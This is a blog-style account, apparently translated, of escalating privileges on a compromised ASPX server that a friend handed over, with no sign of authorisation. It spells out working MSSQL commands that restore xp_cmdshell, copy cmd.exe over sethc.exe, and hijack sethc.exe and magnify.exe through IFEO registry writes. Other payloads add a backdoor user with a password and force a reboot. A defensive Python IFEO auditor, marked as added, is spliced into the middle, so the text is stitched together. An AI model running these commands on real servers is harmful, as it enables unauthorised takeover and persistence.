Notes on an interesting privilege escalation

Source: Internet
Author: User

The shell was provided by a friend known as "Double-Sided Bull". I had planned to watch "Xuanyuan Sword", but he said he was bored and told me to take a look at the privilege escalation. I wasn't interested at first; after all, I had never done anything on his targets. Could I even do it? Still, speed-watching a show is pointless. Just dive in!
 
First, the site is ASPX. Start by scanning for open ports.
 
MSSQL, MySQL, and Serv-U (its administration port, 43958).
Let's see whether Serv-U can be used to escalate (PS: if it were that easy, would he have handed it to me?).
 
Error message: Unable to connect because the target machine actively refused it.
I asked an expert, who said the Serv-U service is stopped, so that road is blocked. Next, let's look at command execution.
 
The built-in c:\windows\system32\cmd.exe cannot be executed, so let's try uploading a new cmd.exe to a readable directory.
 
Then try again
 
Then run systeminfo and take a look.
 
In fact, the focus is on patch information.
 
He said the patches were all applied. This newbie didn't believe it and ran several tests anyway. Fruitless.
 
He suddenly said someone had been through this box before, so I could check whether any traces were left.
 
There really are hidden accounts. Whoever KO'd this box seems to have had a rough time. After many attempts with weak passwords I didn't get in, as I expected; my luck really is the worst. Besides, an expert wouldn't leave such a weak password behind. Now that all of these are dead ends, let's look at 1433 again.
 
Successfully found the configuration file. Hey, it's MSSQL after all. There seems to be hope, but then again... it's a hassle. Whatever, try the connection...
 
Luck isn't bad after all: it's actually SA, on Microsoft SQL Server 2000.
So let's see whether xp_cmdshell exists; if not, add it directly:
use master dbcc addextendedproc ('xp_cmdshell', 'xplog70.dll')
 
Now that the procedure exists, execute a command directly:
exec master.dbo.xp_cmdshell 'whoami'
 
xpsql.cpp: Error 5 from CreateProcess (line 737)
I had never seen this before. A search showed plenty of people hitting the same problem. It turns out error 5 is the Windows system error number, and CreateProcess is the call that creates the new process. The error is closely tied to the system file cmd.exe: either cmd.exe has been deleted, or its permissions have been restricted.
It looks like this road is blocked too. Then I remembered that Pangolin offers two ways to execute commands: besides xp_cmdshell, sp_oacreate can also execute commands.
Use cmd.exe to replace sethc.exe:
declare @o int exec sp_oacreate 'Scripting.FileSystemObject', @o out exec sp_oamethod @o, 'copyfile', null, 'c:\windows\system32\cmd.exe', 'c:\windows\system32\sethc.exe';
 
Could not find the function sp_oacreate in the library odsole70.dll. Reason: 127 (the specified procedure could not be found). So it had been deleted.
I nevertheless ran it once more:
declare @o int exec sp_oacreate 'Scripting.FileSystemObject', @o out exec sp_oamethod @o, 'copyfile', null, 'c:\windows\system32\cmd.exe', 'c:\windows\system32\sethc.exe';
Could not find the function sp_oacreate in the library odsole70.dll. Reason: 127 (the specified procedure could not be found).
 
I couldn't figure out the reason. It took almost the whole afternoon. Still fruitless...
 
Then, while reading a book, I suddenly came across IFEO hijacking...
Since we are bringing in IFEO, a quick introduction first. 1. What is IFEO? IFEO stands for Image File Execution Options, a registry key located at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options. Because it is mainly used for debugging programs, it is of little significance to ordinary users. By default, only Administrators and the local SYSTEM account have permission to read and modify it.
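From the defender's side, that same key is the thing to audit: a Debugger value on an accessibility binary (sethc.exe and magnify.exe are the images targeted later in this write-up) is the tell-tale of exactly this kind of hijack. The following is an added example, not code from the original post: it parses decoded `reg export` text of the IFEO key and reports every Debugger value, rating accessibility binaries as high. The sample export is constructed.

```python
import re
from dataclasses import dataclass

# Hive path the write-up's xp_regwrite calls targeted; compared case-insensitively.
IFEO_PREFIX = ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT"
               "\\CurrentVersion\\Image File Execution Options\\").lower()
# Accessibility helpers launchable from the logon screen; a Debugger on any of
# them can start an arbitrary program as SYSTEM before anyone has signed in.
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "magnify.exe", "osk.exe",
                 "narrator.exe", "displayswitch.exe", "atbroker.exe"}
KEY_RE = re.compile(r"^\[(.+)\]$")
DEBUGGER_RE = re.compile(r'^"Debugger"="(.*)"$', re.IGNORECASE)

@dataclass
class Finding:
    image: str      # executable name directly under the IFEO key
    debugger: str   # Debugger value with .reg escaping undone
    severity: str   # "high" for accessibility binaries, otherwise "review"

def audit_ifeo(reg_export: str) -> list[Finding]:
    """Walk decoded `reg export` text and report every IFEO Debugger value."""
    findings, image = [], None
    for raw in reg_export.splitlines():
        line = raw.strip()
        if m := KEY_RE.match(line):
            key, image = m.group(1), None
            if key.lower().startswith(IFEO_PREFIX):
                rest = key[len(IFEO_PREFIX):]
                image = rest.lower() if "\\" not in rest else None  # skip nested keys
        elif image and (m := DEBUGGER_RE.match(line)):
            debugger = m.group(1).replace("\\\\", "\\")
            findings.append(Finding(image, debugger,
                                    "high" if image in ACCESSIBILITY else "review"))
    return findings

# Constructed sample: the two hijacks from this write-up plus a legitimate
# debugging entry (.reg files double every backslash inside string values).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\WINDOWS\\system32\\cmd.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe]
"debugger"="C:\\WINDOWS\\system32\\cmd.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"DisableExceptionChainValidation"=dword:00000000
"Debugger"="C:\\Tools\\windbg.exe"
'''

if __name__ == "__main__":
    for f in audit_ifeo(SAMPLE_EXPORT):
        print(f"[{f.severity}] {f.image} -> {f.debugger}")
```

A real `reg export` writes UTF-16 with a BOM, so decode the file before passing its text in; the check is also worth running from a SQL Server audit angle, since any login able to call xp_regwrite under a service account running as SYSTEM can write this key.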
 
Let's start with an IFEO hijack:
EXEC master..xp_regwrite
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
@value_name = 'debugger',
@type = 'REG_SZ',
@value = 'C:\WINDOWS\system32\cmd.exe'
 
No error... Hey hey...
Check whether the hijack took effect:
Exec master..xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'debugger'

Debugger    C:\WINDOWS\system32\cmd.exe
Hahaha... Actually succeeded.
 
Er... pressing Shift does nothing...
 
 
Continue:
EXEC master..xp_regwrite
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',
@value_name = 'debugger',
@type = 'REG_SZ',
@value = 'C:\WINDOWS\system32\cmd.exe'

Run the read to check whether the hijack took effect:
Exec master..xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', 'debugger'
 
Frustrating; it still won't pop up.
 
In case the system cmd.exe is disabled, point it at the cmd.exe I uploaded myself:
EXEC master..xp_regwrite @rootkey = 'HKEY_LOCAL_MACHINE', @key = 'Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', @value_name = 'debugger', @type = 'REG_SZ', @value = 'f:\umail\mysql\cmd.exe'
 
My own cmd.exe doesn't show up either; it simply won't pop up. Then I wrapped the commands in a .bat and found the user was not added successfully.
Then came this suggestion:
 
Continue:
EXEC master..xp_regwrite
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',
@value_name = 'debugger',
@type = 'REG_SZ',
@value = 'f:\umail\mysql\net1.exe user guset a123456789 /add'
Then run:
Exec master..xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', 'debugger'
 

It went through, but it's probably the same story. Whatever it is, check it first.
 
In the meantime, Explorer and Task Manager failed as well.
 
All sorts of annoyances.
 
Still unsuccessful
 
Okay. Continue:
EXEC master..xp_regwrite @rootkey = 'HKEY_LOCAL_MACHINE', @key = 'Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', @value_name = 'debugger', @type = 'REG_SZ', @value = 'C:\windows\system32\shutdown -r -t 0'
View:
Exec master..xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', 'debugger'
 
But it still doesn't restart. A whole night passed and I still hadn't gotten it.
Got up in the morning.
 
Time to bow to the master.
 
 
Okay, got it...
 
 
Thank you for your guidance.